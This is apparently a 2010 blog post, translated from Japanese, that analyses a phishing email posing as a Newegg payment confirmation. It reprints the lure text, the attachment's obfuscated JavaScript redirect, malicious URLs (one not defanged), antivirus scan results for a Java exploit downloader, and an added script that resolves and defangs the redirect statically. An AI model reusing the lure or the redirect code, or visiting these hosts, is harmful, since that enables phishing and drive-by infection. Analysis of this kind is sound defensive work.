[Today's lure email] The "tiger at the front gate, wolf at the back gate" type
Subject
Newegg.com - Payment Charged
Body
Newegg.com - Payment Charged
Customer ID: 353455
AccountNumber: 47346765765
Hello,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 134564535)has been successfully charged to your VISA and orderverification is now complete.
Please find attached invoice.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
Newegg.com,9997 E. Rose Hills Road, Whittier, CA. 90601 | 2000-2010 Newegg Inc.All rights reserved.
Attachment
NewEgg Invoice.html: the script portion it contains
function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;<
Redirect target → h丁丁p://tracebook.us/1.html
Meta tag → h丁丁p://cetogilco.cz.cc/scanner10/?afid=24
Checking it with aguse.jp, it is not alive today. So that's how it is!
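
The split-string redirect in the attachment script can be resolved statically, without opening the file in a browser. This is an added example, not part of the original post: `foldConcat`, `extractRedirects` and `defang` are hypothetical helper names, and `SAMPLE` is an excerpt of the script quoted above, held as inert text.

```javascript
// Excerpt of the attachment script quoted above, held as inert text (never evaluated).
const SAMPLE = `function r(){};r.prototype = {p : function() { this.j='';var pN=54899;` +
  `document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");` +
  `this.g=59634;}};var zA=new r();zA.p();`;

// Fold a chain of quoted literals, each optionally followed by .substr(start,len),
// joined by "+". Returns null for anything else, so there is no guessing and no eval().
function foldConcat(expr) {
  const term = /\s*(["'])((?:(?!\1)[^\\])*)\1(?:\.substr\(\s*(\d+)\s*(?:,\s*(\d+)\s*)?\))?\s*/y;
  let out = '';
  let pos = 0;
  for (;;) {
    term.lastIndex = pos;
    const m = term.exec(expr);
    if (!m) return null;                       // variable, call or escape: refuse
    const start = m[3] === undefined ? 0 : Number(m[3]);
    const end = m[4] === undefined ? undefined : start + Number(m[4]);
    out += m[2].slice(start, end);             // substr(start,len) on the literal
    pos = term.lastIndex;
    if (pos === expr.length) return out;
    if (expr[pos] !== '+') return null;
    pos += 1;
  }
}

// Find assignments to location / location.href and fold their right-hand side.
function extractRedirects(script) {
  const assign = /(?:document\.|window\.)?location(?:\.href)?\s*=(?!=)\s*([^;]+);/g;
  const urls = [];
  for (const m of script.matchAll(assign)) {
    let rhs = m[1].trim();
    const wrapped = /^[A-Za-z_$][\w$]*\((.*)\)$/.exec(rhs); // one wrapper call, e.g. string(...)
    if (wrapped) rhs = wrapped[1];
    const url = foldConcat(rhs);
    if (url !== null) urls.push(url);
  }
  return urls;
}

// Defang for safe sharing in notes and tickets: hxxp scheme, bracketed dots in the host.
function defang(url) {
  return url.replace(/^(h)tt(ps?:\/\/)([^\/]+)/i,
    (_, h, rest, host) => `${h}xx${rest}${host.replace(/\./g, '[.]')}`);
}

console.log(extractRedirects(SAMPLE).map(defang));
```
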

iframe tag → http://windows-portal.in/3/index.php?message=151&on=back&navig=ddd&pool=ssl
As for this one,
h丁丁p://windows-portal.in/home/j.php gets downloaded, and
MD5: f6c79355101b4c382d2bb3e12e7b4fe2
Date first seen: 2010-06-17 17:50:15 (UTC)
Date last seen: 2010-08-24 12:36:27 (UTC)
Detection ratio: 16/42
Virus check results
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.08.24.00 | 2010.08.23 | - |
AntiVir | 8.2.4.38 | 2010.08.24 | JAVA/Dldr.Agent.W |
Antiy-AVL | 2.0.3.7 | 2010.08.23 | - |
Authentium | 5.2.0.5 | 2010.08.24 | - |
Avast | 4.8.1351.0 | 2010.08.23 | Java:Agent-BA |
Avast5 | 5.0.332.0 | 2010.08.23 | Java:Agent-BA |
AVG | 9.0.0.851 | 2010.08.24 | Generic2_c.BOMJ |
BitDefender | 7.2 | 2010.08.24 | - |
CAT-QuickHeal | 11.00 | 2010.08.24 | - |
ClamAV | 0.96.2.0-git | 2010.08.24 | Trojan.Java.Rowindal |
Comodo | 5843 | 2010.08.24 | - |
DrWeb | 5.0.2.03300 | 2010.08.24 | - |
Emsisoft | 5.0.0.37 | 2010.08.24 | Trojan.Java.Rowindal!IK |
eSafe | 7.0.17.0 | 2010.08.23 | - |
eTrust-Vet | 36.1.7810 | 2010.08.23 | - |
F-Prot | 4.6.1.107 | 2010.08.24 | - |
F-Secure | 9.0.15370.0 | 2010.08.24 | Trojan:Java/Rowindal.A |
Fortinet | 4.1.143.0 | 2010.08.24 | - |
GData | 21 | 2010.08.24 | Java:Agent-BA |
Ikarus | T3.1.1.88.0 | 2010.08.24 | Trojan.Java.Rowindal |
Jiangmin | 13.0.900 | 2010.08.23 | - |
Kaspersky | 7.0.0.125 | 2010.08.24 | Exploit.Java.CVE-2010-0094.a |
McAfee | 5.400.0.1158 | 2010.08.24 | - |
McAfee-GW-Edition | 2010.1B | 2010.08.24 | - |
Microsoft | 1.6103 | 2010.08.24 | Trojan:Java/Rowindal.A |
NOD32 | 5393 | 2010.08.24 | a variant of Java/Rowindal.A |
Norman | 6.05.11 | 2010.08.24 | Java/Rowindal.B |
nProtect | 2010-08-24.01 | 2010.08.24 | - |
Panda | 10.0.2.7 | 2010.08.24 | - |
PCTools | 7.0.3.5 | 2010.08.24 | - |
Prevx | 3.0 | 2010.08.24 | - |
Rising | 22.62.01.04 | 2010.08.24 | - |
Sophos | 4.56.0 | 2010.08.24 | Mal/JavaDldr-B |
Sunbelt | 6784 | 2010.08.24 | - |
SUPERAntiSpyware | 4.40.0.1006 | 2010.08.24 | - |
Symantec | 20101.1.1.7 | 2010.08.24 | - |
TheHacker | 6.5.2.1.355 | 2010.08.24 | - |
TrendMicro | 9.120.0.1004 | 2010.08.24 | TROJ_JAVA.BM |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.08.24 | TROJ_JAVA.AQ |
VBA32 | 3.12.14.0 | 2010.08.24 | - |
ViRobot | 2010.8.24.4005 | 2010.08.24 | - |
VirusBuster | 5.0.27.0 | 2010.08.23 | - |

MD5: f6c79355101b4c382d2bb3e12e7b4fe2
SHA1: 4487aaae64abd6b47a331dca6404e113a2ffde14
SHA256: 0997384a932a2278a5e5dc19de075bcd758ba8e2ef5b23b2b8d341f613c22cc6
File size: 8429 bytes
Scan date: 2010-08-24 12:36:27 (UTC)